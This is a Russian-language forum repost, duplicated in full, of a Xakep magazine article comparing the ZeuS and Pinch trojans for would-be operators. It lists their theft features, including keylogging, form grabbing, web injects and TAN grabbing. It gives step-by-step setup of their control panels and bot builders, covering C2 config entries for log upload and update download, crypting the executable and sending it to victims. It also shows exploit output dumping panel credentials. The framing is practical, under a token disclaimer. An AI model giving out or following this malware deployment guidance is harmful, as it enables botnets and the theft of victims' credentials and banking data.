timonsyz
17.06.2010, 03:37
Каждый день мы сталкиваемся с задачами, решение которых невозможно без использования троянов. Какой продукт выбрать? Стоит ли писать свой собственный трой или обратить внимание на модификации уже существующих? Какому билду доверить свои силы, время и затраченные средства? Запасись терпением, я подробно расскажу о наиболее известных троях, их конфигурациях и практическом применении.
Речь пойдет, прежде всего, о таких троянах, как Pinch и ZeuS. Во-первых, оба продукта широко известны, а во-вторых, найти рабочую версию в паблике/полупривате не составит большого труда. Следовательно, можно опробовать полученные навыки на практике (естественно, на тренировочной машине, под VmWare, - Прим. Forb). Хочу тебя предостеречь: в Сети валяется куча протрояненных билдов, так что будь осторожен и не сливай софт из сомнительных источников.
Но – ближе к делу! Сначала давай подробнее познакомимся с ZeuS'ом, а затем кратко сравним его с Pinch'ем.
Zeus VS Pinch
ZeuS состоит из двух основных частей:
1. панель управления - набор скриптов, включая админку, инсталлируемые на сервер;
2. билдер - Win32-конфигуратор бота.
О панели управления мы поговорим позже, так же, как и о конфигурировании самого троя. Сейчас нас интересует перечень основных возможностей продукта:
* Отсутствие собственного процесса; как следствие, троянец невидим в списке процессов
* Обход большинства файрволов (в зависимости от версии)
* Использование временных файлов с произвольным размером
* Работает в ограниченных учетных записях Винды (кроме Гостя)
* Зашифрованное тело бота
* Блокирует Windows Firewall, что обеспечивает беспрепятственное получение входящих сообщений
* Все настройки/логи/команды бот хранит/принимает/передает по [Ссылки доступны только зарегистрированным пользователям]протоколу в зашифрованном виде
* Наличие отдельного файла конфигурации позволяет подстраховать себя от потери ботнета в случаи недоступности основного сервера
* Наличие резервных файлов конфигурации, используемых при отсутствии основного файла конфигурации
* Возможность работать с любыми браузерами/программами, работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.)
* Перехват POST-данных и перехват нажатых клавиш, включая данные из буфера обмена
* Прозрачный URL-редирект на фейк-сайты c заданием простейших условий редиректа (GET/POST-запросы, и т.д.)
* Работа с веб-инжектами, которые позволяют подменять не только хтмл-страницы, но и любой другой тип данных. Подмена задается при помощи указания масок подмены
* Получение содержимого нужной страницы с исключением хтмл-тегов
* Настраиваемый TAN-граббер для любых стран
* Получение скриншота в области экрана, где была нажата левая кнопка мыши, после захода на нужный URL
* Получение любых импортируемых сертификатов и их сохранение на сервере
* Перехват логинов/паролей по протоколам POP3 и FTP в независимости от порта, и запись в лог только при удачной авторизации
* Поиск на логических дисках файлов по маске и/или загрузка конкретного файла
* Получение скриншота с компьютера жертвы в реальном времени (компьютер должен находиться вне NAT)
Как видишь, троян обладает феноменальными способностями . Теперь посмотрим на Pinch.
Pinch состоит из трех частей:
1. панель управления - набор скриптов, включая админку, инсталлируемые на сервер;
2. билдер - Win32-конфигуратор трояна;
3. парсер логов - утила для расшифровки и парсинга логов троя.
Среди основных возможностей продукта – перехват логинов/паролей по протоколам POP3/FTP, а так же граббинг сохраненных данных из IE.
Описывать функциональную часть пинча я не буду, это уже сделали за меня. Скажу лишь, что оба трояна отличаются целью применения. ZeuS предназначен, прежде всего, для построения долгосрочных ботнетов. Тебе обязательно потребуется абузоустойчивый сервер для управления ботнетом и хранения логов. Pinch же, как правило, используют для нанесения «точечных ударов» (протроянивание конкретного человека с целью получения конкретной информации). В этом случае гораздо удобнее и безопаснее заливать админку на ломаный шелл, с последующим удалением оной.
Настройка и конфигурация троев
С Pinch'ем все просто.
1. Устанавливаем логин/пароль в файле filelist.php:
$login='xakep';
$password='blabla';
2. В файле admin.php устанавливаем режим ведения логов:
$mode = 2; //Сохраняем на сервере
3. Заливаем файлы admin.php, filelist.php и каталог /reps на удаленный сервер.
4. Устанавливаем права 777 на каталог /reps.
5. По желанию прописываем и добавляем .htaccess (в целях безопасности).
6. Запускаем билдер, указываем хост и полный путь до admin.php относительно веб-каталога. Например:
хост - 127.0.0.1
путь - /img/admin.php
7. Получаем готовый exe'шник, который криптуем по своему усмотрению.
После того, как трой разослан, необходимо пристально следить за админкой – в скором времени там появятся логи, которые ты сможешь скачать и просмотреть при помощи Parser'а.
А вот с ZeUS'ом все несколько сложнее.
1. Заливаем панельку на сервер, после чего устанавливаем ее:
[Ссылки доступны только зарегистрированным пользователям]
2. П ходу инсталляции тебе необходимо указать следующие данные:
* Root login: логин/пасс для админки ботнета;
* MySQL server: данные для MySQL (пользователь уже должен существовать, но если указанная БД не существует, то она будет создана автоматически);
* MySQL tables: названия таблиц в БД (следует изменить в качестве маскировки);
* Local paths: локальные пути на сервере относительно директории установки.
3. Выбираем способ хранения логов (БД или в файлах) и указываем тайм-аут для ботов.
4. Ставим права 777 на каталог /system и завершаем установку.
5. После создания вложенного каталога /.files, необходимо запретить выполнение скриптов из этого каталога с помощью .htaccess следующего содержания:
RemoveType php
php_flag engine 0
php_flag engine 0
По Сети давно гуляет сплойт, с помощью которого можно без труда залить шелл на твой сервер и завладеть ботнетом, если ты отнесешься невнимательно к этой превентивной мере безопасности.
6. Запускаем билдер (по дефолту – «/local/cp.exe»).
7. Указываем файл конфигурации и жмем «Edit config», после чего конфигурируем будущего бота. Следует обратить внимание на такие пункты, как:
entry "StaticConfig"
;botnet "botnet1"; здесь указываем имя ботнета, в нашем случае - botnet1
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "[Ссылки доступны только зарегистрированным пользователям]"; здесь указываем местонахождение основного конфига, в нашем случае - [Ссылки доступны только зарегистрированным пользователям]
url_compip "[Ссылки доступны только зарегистрированным пользователям]" 256; сайт, на котором можно проверить свой IP, нужен для определения NAT
;blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "[Ссылки доступны только зарегистрированным пользователям]"; указываем адрес, по которому можно скачать апдейт бота
url_server "[Ссылки доступны только зарегистрированным пользователям]"; наш сервер, на который будут отправляться логи и файлы с ботов
file_webinjects "webinjects.txt"; файл со списком веб-инжектов
entry "AdvancedConfigs"
"[Ссылки доступны только зарегистрированным пользователям]"; в этом разделе указываем адреса, с которых можно скачать резервный конфиг
end
8. Билдим бота и криптуем его по собственному усмотрению.
Теперь немного о панели управления aka админка. В отличие от примитивной пинчевой панельки, мощная админка зеуса обладает такими функциями, как:
* Многопользовательский режим; каждому пользователю можно задать определенные права доступа
* Статистика установок (инсталлов, заражений)
* Статистика ботов находящихся онлайн
* Разделение ботнета на саб-ботнеты
* Обзор онлайновых ботов (в том числе и по фильтру)
* Просмотр скриншота в реальном времени
* Просмотр и проверка Sock4
* Время нахождения бота в онлайне
* Скорость соединения (только для ботов вне NAT)
* Хранение логов в базе данных (дает следующие преимущества: поиск логов по фильтру содержимого; поиск логов по шаблонам с выделением нужных POST-данных)
* Хранение логов в зашифрованных файлах, в структуре директорий ботнет\страна\ID компьютера
* Отдача команд ботам (в том числе и по фильтру)
* Возможность собственноручного модифицирования админки
Как видишь, опций более чем достаточно. Но в каждой бочке меда есть своя ложка дегтя. В случае с ZeuS'ом – это напрочь бажная и дырявая админка, в которой неоднократно находили sql-инъекции. Кроме того, я уже говорил об обязательном запрете на выполнение скриптов в каталоге /.files. Соответствующий сплойт ты без труда найдешь на просторах Сети. Использовать его довольно просто, достаточно лишь передать скрипту необходимые параметры:
HOST: 127.0.0.1
FOLDER: web/
После запуска сплойт выдаст нам следующие данные:
array(8) { [0]=> string(1) "1" ["id"]=> string(1) "1" [1]=> string(4) "root" ["login"]=> string(4) "root" [2]=> string(6) "t00r" ["pass"]=> string(6) "t00r" [3]=> string(10) "8194967292" ["priv"]=> string(10) "8194967292" } array(8) { [0]=> string(1) "2" ["id"]=> string(1) "2" [1]=> string(9) "admin" ["login"]=> string(9) "admin" [2]=> string(6) "12345098" ["pass"]=> string(6) "12345098" [3]=> string(7) "3097136" ["priv"]=> string(7) "3097136" } array(8) { [0]=> string(1) "4" ["id"]=> string(1) "4" [1]=> string(7) "bob" ["login"]=> string(7) "bob" [2]=> string(6) "bobyboy" ["pass"]=> string(6) "bobyboy" [3]=> string(6) "468872" ["priv"]=> string(6) "468872" } MYSQLHOST: localhost MYSQLUSER:zeus MYSQLPASS:grab_pass
Отсюда получаем:
1. Аккаунты к админке:
root - логин
toor - пароль
admin - логин
12345098 - пароль
bob - логин
bobyboy - пароль
2. Аккаунт к СУБД:
логин: zeus
пароль: grab_pass
Сам понимаешь, получить доступ к твоему ботнету не составит особого труда. В любом случае, выбирать тебе, а я лишь описал два наиболее известных и распространенных трояна, существование которых ни для кого не является секретом .
Danger
Внимание! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут!
Info
* При установке админки в ZeuS не забывай об обязательном запрете на выполнение скриптов в каталоге /.files, иначе ботнета не видать, как своих ушей.
* Стандартная админка ZeuS'а имеет несколько вкусных sql-инъекций. Покопавшись в Сети либо в самой админке можно без труда найти их.
* При выборе трояна руководствуйся поставленной задачей.
©Netterberg
журнал xakep.ru
Речь пойдет, прежде всего, о таких троянах, как Pinch и ZeuS. Во-первых, оба продукта широко известны, а во-вторых, найти рабочую версию в паблике/полупривате не составит большого труда. Следовательно, можно опробовать полученные навыки на практике (естественно, на тренировочной машине, под VmWare, - Прим. Forb). Хочу тебя предостеречь: в Сети валяется куча протрояненных билдов, так что будь осторожен и не сливай софт из сомнительных источников.
Но – ближе к делу! Сначала давай подробнее познакомимся с ZeuS'ом, а затем кратко сравним его с Pinch'ем.
Zeus VS Pinch
ZeuS состоит из двух основных частей:
1. панель управления - набор скриптов, включая админку, инсталлируемые на сервер;
2. билдер - Win32-конфигуратор бота.
О панели управления мы поговорим позже, так же, как и о конфигурировании самого троя. Сейчас нас интересует перечень основных возможностей продукта:
* Отсутствие собственного процесса; как следствие, троянец невидим в списке процессов
* Обход большинства файрволов (в зависимости от версии)
* Использование временных файлов с произвольным размером
* Работает в ограниченных учетных записях Винды (кроме Гостя)
* Зашифрованное тело бота
* Блокирует Windows Firewall, что обеспечивает беспрепятственное получение входящих сообщений
* Все настройки/логи/команды бот хранит/принимает/передает по [Ссылки доступны только зарегистрированным пользователям]протоколу в зашифрованном виде
* Наличие отдельного файла конфигурации позволяет подстраховать себя от потери ботнета в случаи недоступности основного сервера
* Наличие резервных файлов конфигурации, используемых при отсутствии основного файла конфигурации
* Возможность работать с любыми браузерами/программами, работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.)
* Перехват POST-данных и перехват нажатых клавиш, включая данные из буфера обмена
* Прозрачный URL-редирект на фейк-сайты c заданием простейших условий редиректа (GET/POST-запросы, и т.д.)
* Работа с веб-инжектами, которые позволяют подменять не только хтмл-страницы, но и любой другой тип данных. Подмена задается при помощи указания масок подмены
* Получение содержимого нужной страницы с исключением хтмл-тегов
* Настраиваемый TAN-граббер для любых стран
* Получение скриншота в области экрана, где была нажата левая кнопка мыши, после захода на нужный URL
* Получение любых импортируемых сертификатов и их сохранение на сервере
* Перехват логинов/паролей по протоколам POP3 и FTP в независимости от порта, и запись в лог только при удачной авторизации
* Поиск на логических дисках файлов по маске и/или загрузка конкретного файла
* Получение скриншота с компьютера жертвы в реальном времени (компьютер должен находиться вне NAT)
Как видишь, троян обладает феноменальными способностями . Теперь посмотрим на Pinch.
Pinch состоит из трех частей:
1. панель управления - набор скриптов, включая админку, инсталлируемые на сервер;
2. билдер - Win32-конфигуратор трояна;
3. парсер логов - утила для расшифровки и парсинга логов троя.
Среди основных возможностей продукта – перехват логинов/паролей по протоколам POP3/FTP, а так же граббинг сохраненных данных из IE.
Описывать функциональную часть пинча я не буду, это уже сделали за меня. Скажу лишь, что оба трояна отличаются целью применения. ZeuS предназначен, прежде всего, для построения долгосрочных ботнетов. Тебе обязательно потребуется абузоустойчивый сервер для управления ботнетом и хранения логов. Pinch же, как правило, используют для нанесения «точечных ударов» (протроянивание конкретного человека с целью получения конкретной информации). В этом случае гораздо удобнее и безопаснее заливать админку на ломаный шелл, с последующим удалением оной.
Настройка и конфигурация троев
С Pinch'ем все просто.
1. Устанавливаем логин/пароль в файле filelist.php:
$login='xakep';
$password='blabla';
2. В файле admin.php устанавливаем режим ведения логов:
$mode = 2; //Сохраняем на сервере
3. Заливаем файлы admin.php, filelist.php и каталог /reps на удаленный сервер.
4. Устанавливаем права 777 на каталог /reps.
5. По желанию прописываем и добавляем .htaccess (в целях безопасности).
6. Запускаем билдер, указываем хост и полный путь до admin.php относительно веб-каталога. Например:
хост - 127.0.0.1
путь - /img/admin.php
7. Получаем готовый exe'шник, который криптуем по своему усмотрению.
После того, как трой разослан, необходимо пристально следить за админкой – в скором времени там появятся логи, которые ты сможешь скачать и просмотреть при помощи Parser'а.
А вот с ZeUS'ом все несколько сложнее.
1. Заливаем панельку на сервер, после чего устанавливаем ее:
[Ссылки доступны только зарегистрированным пользователям]
2. П ходу инсталляции тебе необходимо указать следующие данные:
* Root login: логин/пасс для админки ботнета;
* MySQL server: данные для MySQL (пользователь уже должен существовать, но если указанная БД не существует, то она будет создана автоматически);
* MySQL tables: названия таблиц в БД (следует изменить в качестве маскировки);
* Local paths: локальные пути на сервере относительно директории установки.
3. Выбираем способ хранения логов (БД или в файлах) и указываем тайм-аут для ботов.
4. Ставим права 777 на каталог /system и завершаем установку.
5. После создания вложенного каталога /.files, необходимо запретить выполнение скриптов из этого каталога с помощью .htaccess следующего содержания:
RemoveType php
php_flag engine 0
php_flag engine 0
По Сети давно гуляет сплойт, с помощью которого можно без труда залить шелл на твой сервер и завладеть ботнетом, если ты отнесешься невнимательно к этой превентивной мере безопасности.
6. Запускаем билдер (по дефолту – «/local/cp.exe»).
7. Указываем файл конфигурации и жмем «Edit config», после чего конфигурируем будущего бота. Следует обратить внимание на такие пункты, как:
entry "StaticConfig"
;botnet "botnet1"; здесь указываем имя ботнета, в нашем случае - botnet1
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "[Ссылки доступны только зарегистрированным пользователям]"; здесь указываем местонахождение основного конфига, в нашем случае - [Ссылки доступны только зарегистрированным пользователям]
url_compip "[Ссылки доступны только зарегистрированным пользователям]" 256; сайт, на котором можно проверить свой IP, нужен для определения NAT
;blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "[Ссылки доступны только зарегистрированным пользователям]"; указываем адрес, по которому можно скачать апдейт бота
url_server "[Ссылки доступны только зарегистрированным пользователям]"; наш сервер, на который будут отправляться логи и файлы с ботов
file_webinjects "webinjects.txt"; файл со списком веб-инжектов
entry "AdvancedConfigs"
"[Ссылки доступны только зарегистрированным пользователям]"; в этом разделе указываем адреса, с которых можно скачать резервный конфиг
end
8. Билдим бота и криптуем его по собственному усмотрению.
Теперь немного о панели управления aka админка. В отличие от примитивной пинчевой панельки, мощная админка зеуса обладает такими функциями, как:
* Многопользовательский режим; каждому пользователю можно задать определенные права доступа
* Статистика установок (инсталлов, заражений)
* Статистика ботов находящихся онлайн
* Разделение ботнета на саб-ботнеты
* Обзор онлайновых ботов (в том числе и по фильтру)
* Просмотр скриншота в реальном времени
* Просмотр и проверка Sock4
* Время нахождения бота в онлайне
* Скорость соединения (только для ботов вне NAT)
* Хранение логов в базе данных (дает следующие преимущества: поиск логов по фильтру содержимого; поиск логов по шаблонам с выделением нужных POST-данных)
* Хранение логов в зашифрованных файлах, в структуре директорий ботнет\страна\ID компьютера
* Отдача команд ботам (в том числе и по фильтру)
* Возможность собственноручного модифицирования админки
Как видишь, опций более чем достаточно. Но в каждой бочке меда есть своя ложка дегтя. В случае с ZeuS'ом – это напрочь бажная и дырявая админка, в которой неоднократно находили sql-инъекции. Кроме того, я уже говорил об обязательном запрете на выполнение скриптов в каталоге /.files. Соответствующий сплойт ты без труда найдешь на просторах Сети. Использовать его довольно просто, достаточно лишь передать скрипту необходимые параметры:
HOST: 127.0.0.1
FOLDER: web/
После запуска сплойт выдаст нам следующие данные:
array(8) { [0]=> string(1) "1" ["id"]=> string(1) "1" [1]=> string(4) "root" ["login"]=> string(4) "root" [2]=> string(6) "t00r" ["pass"]=> string(6) "t00r" [3]=> string(10) "8194967292" ["priv"]=> string(10) "8194967292" } array(8) { [0]=> string(1) "2" ["id"]=> string(1) "2" [1]=> string(9) "admin" ["login"]=> string(9) "admin" [2]=> string(6) "12345098" ["pass"]=> string(6) "12345098" [3]=> string(7) "3097136" ["priv"]=> string(7) "3097136" } array(8) { [0]=> string(1) "4" ["id"]=> string(1) "4" [1]=> string(7) "bob" ["login"]=> string(7) "bob" [2]=> string(6) "bobyboy" ["pass"]=> string(6) "bobyboy" [3]=> string(6) "468872" ["priv"]=> string(6) "468872" } MYSQLHOST: localhost MYSQLUSER:zeus MYSQLPASS:grab_pass
Отсюда получаем:
1. Аккаунты к админке:
root - логин
toor - пароль
admin - логин
12345098 - пароль
bob - логин
bobyboy - пароль
2. Аккаунт к СУБД:
логин: zeus
пароль: grab_pass
Сам понимаешь, получить доступ к твоему ботнету не составит особого труда. В любом случае, выбирать тебе, а я лишь описал два наиболее известных и распространенных трояна, существование которых ни для кого не является секретом .
Danger
Внимание! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут!
Info
* При установке админки в ZeuS не забывай об обязательном запрете на выполнение скриптов в каталоге /.files, иначе ботнета не видать, как своих ушей.
* Стандартная админка ZeuS'а имеет несколько вкусных sql-инъекций. Покопавшись в Сети либо в самой админке можно без труда найти их.
* При выборе трояна руководствуйся поставленной задачей.
©Netterberg
журнал xakep.ru